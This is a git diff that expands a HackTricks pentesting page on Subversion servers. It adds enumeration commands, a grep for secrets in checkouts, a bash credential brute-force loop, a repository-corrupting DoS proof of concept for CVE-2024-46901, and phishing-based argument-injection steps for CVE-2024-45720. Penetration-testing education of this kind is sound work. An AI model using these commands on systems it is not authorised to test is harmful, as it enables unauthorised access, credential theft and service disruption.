Merge pull request #1876 from HackTricks-wiki/research_update_src_network-services-pentesting_3690-pentesting-subversion-svn-server_20260209_132214

carlospolop · web-flow · commit ec8dcaba40ad · 2026-02-09T14:25:45.000+01:00
Research Update Enhanced src/network-services-pentesting/369...
diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md
@@ -4,31 +4,93 @@
 
 ## Basic Information
 
-**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently.
+**Subversion (SVN)** is a centralized **version control system** (Apache license) used for software versioning and revision control.
 
-**Default port:** 3690
+**Default port:** `3690/tcp` (svnserve). It can also be exposed via **HTTP/HTTPS** through `mod_dav_svn` and via **svn+ssh**.
 
-```
+```text
 PORT     STATE SERVICE
 3690/tcp open  svnserve Subversion
 ```
 
 ### Banner Grabbing
 
-```
+```bash
 nc -vn 10.10.10.10 3690
+svnserve --version           # if shell access is obtained
+svn --version                # client version leak via error messages
 ```
 
 ## Enumeration
 
 ```bash
-svn ls svn://10.10.10.203 #list
-svn log svn://10.10.10.203 #Commit history
-svn checkout svn://10.10.10.203 #Download the repository
-svn up -r 2 #Go to revision 2 inside the checkout folder
+# Anonymous / authenticated listing
+svn ls svn://10.10.10.203                  # list root
+svn ls -R svn://10.10.10.203/repo         # recursive list
+svn info svn://10.10.10.203/repo          # repo metadata
+svn log svn://10.10.10.203/repo           # commit history
+svn checkout svn://10.10.10.203/repo      # checkout repository
+svn up -r 2                               # move working copy to revision 2
+svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes
+
+# If served over HTTP(S)
+svn ls https://10.10.10.10/svn/repo --username guest --password ''
+
+# Extract revision props (often contain build creds, URLs, tokens)
+svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo
 ```
 
-{{#include ../banners/hacktricks-training.md}}
+### Auth & Misconfig Hunting
+
+- `svnserve.conf` may allow `anon-access = read` (or even write). If you can list, try `checkout` to dump secrets, scripts, CI tokens.
+- Repositories frequently store **build pipelines**, **deployment keys**, and **database credentials** in versioned config files. Grep the working copy after checkout: `grep -R "password\|secret\|token" -n .`.
+- If svn+ssh is enabled, user shells often allow restricted `svnserve` commands; attempt `ssh user@host svnserve -t` with crafted subcommands to bypass wrappers.
+
+### Bruteforcing credentials (svnserve)
+
+`sasl` authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:
+```bash
+for u in admin dev ci; do
+  for p in $(cat /tmp/passlist); do
+    svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
+  done
+done
+```
 
+## Recent Vulnerabilities (practical impact)
 
+### mod_dav_svn DoS via control characters (CVE-2024-46901)
 
+- A user with commit rights can write a path containing control chars (e.g. `\x01`, `\x7f`) that **corrupts the repository**, making later checkouts/logs fail and potentially crashing `mod_dav_svn` workers.
+- Affects Subversion ≤ **1.14.4** when served through **HTTP(S)** (`mod_dav_svn`). Fixed in **1.14.5**.
+- PoC commit with `svnmucc` (requires valid commit creds):
+```bash
+# create payload file
+printf 'pwn' > /tmp/payload
+# commit a path with a control character in its name
+svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
+```
+- After the commit, normal clients may crash or refuse updates until admins manually remove the revision with `svnadmin dump/filter/load`.
+
+### Windows argument injection in svn client (CVE-2024-45720)
+
+- On Windows, "best-fit" character encoding in `svn.exe` allows **command-line argument injection** when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.
+- Affects Subversion ≤ **1.14.3** on Windows only; fixed in **1.14.4**. Attack surface: phishing a developer to run `svn` on an attacker-controlled URL/path.
+- Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into `" & calc.exe & "`-style injected args, then trick the victim to run `svn status` or similar on that path.
+
+## Notes for Exploitation Workflow
+
+1. **Check access method**: `svn://` (svnserve), `http(s)://.../svn/` (mod_dav_svn), or `svn+ssh://`.
+2. **Try anonymous read** first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
+3. **Enumerate hooks**: `hooks/pre-commit`, `post-commit` scripts sometimes contain plaintext credentials or hostnames.
+4. **Leverage `svn:externals`** to pull additional paths from other hosts; list them with `svn propget svn:externals -R .` after checkout.
+5. **Version leaks**: HTTP response headers from `mod_dav_svn` usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
+6. If you obtain filesystem access to the repo, `svnadmin dump`/`svnlook author`/`svnlook dirs-changed` allow offline analysis without credentials.
+
+
+
+## References
+
+- [Apache Subversion security advisory CVE-2024-46901](https://subversion.apache.org/security/CVE-2024-46901-advisory.txt)
+- [Apache Subversion security advisory CVE-2024-45720](https://subversion.apache.org/security/CVE-2024-45720-advisory.txt)
+{{#include ../banners/hacktricks-training.md}}
